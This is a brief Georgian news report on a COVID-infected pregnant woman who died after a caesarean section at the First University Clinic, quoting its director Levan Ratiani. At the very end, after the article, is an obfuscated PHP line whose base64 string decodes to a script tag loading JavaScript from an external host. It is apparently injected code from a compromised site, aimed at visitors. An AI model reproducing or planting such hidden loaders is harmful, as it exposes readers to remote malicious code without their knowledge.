celsiusi
ავერსი საქკაბელი
პირველ საუნივერსიტეტო კლინიკაში კოვიდ-ინფიცირებული ქალი საკეისრო კვეთის შემდეგ გარდაიცვალა - ინფორმაციას ამის შესახებ სხვადასხვა მედიასაშუალებები კლინიკის დირექტორ ლევან რატიანზე დაყრდნობით ავრცელებენ.
 
ლევან რატიანი კოვიდინფიცირებული ორსული ქალბატონის, საკეისრო კვეთის შემდეგ გარდაცვალების ფაქტს ადასტურებს და განმარტავს, რომ კლინიკაში შეყვანისას მას ფილტვების 22-ქულიანი დაზიანება აღენიშნებოდა.
 
„შემოყვანილი იყო 36 კვირის ორსული ქალბატონი, რომელიც საკეისრო კვეთაზე შეიყვანეს, დადასტურებული იყო კოვიდინფექცია, ფილტვების დაზიანების 22 ქულიანი შეფასებით. სუნთქვის უკმარისობის შემდეგ დამძიმდა მწვავე სეფსისი, ბავშვი გადარჩა, მოხსნილია აპარატიდან, დღენაკლულია, მაგრამ კარგად არის“, - განაცხადა ლევან რატიანმა.
958
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");